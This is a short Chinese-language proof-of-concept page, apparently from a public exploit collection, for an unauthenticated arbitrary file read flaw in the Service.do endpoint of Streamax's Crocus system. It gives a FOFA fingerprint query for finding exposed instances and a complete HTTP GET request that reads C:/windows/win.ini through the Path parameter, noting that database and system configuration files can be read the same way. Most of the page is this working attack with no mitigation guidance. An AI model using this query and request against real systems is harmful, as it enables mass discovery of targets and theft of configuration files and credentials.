adysec_POC/wpoc/锐明技术Crocus系统/锐明技术Crocus系统Service.do任意文件读取漏洞.md
2025-03-07 18:18:50 +08:00

25 lines
980 B
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## 锐明技术Crocus系统Service.do任意文件读取漏洞
锐明技术Crocus系统 Service.do接口存在任意文件读取漏洞未经过身份验证的远程攻击者可通过该漏洞读取系统重要文件如数据库配置文件、系统配置文件、数据库配置文件等等导致网站处于极度不安全状态。
## fofa
```
body="/ThirdResource/respond/respond.min.js" && title="Crocus"
```
## poc
```
GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407031718375.png)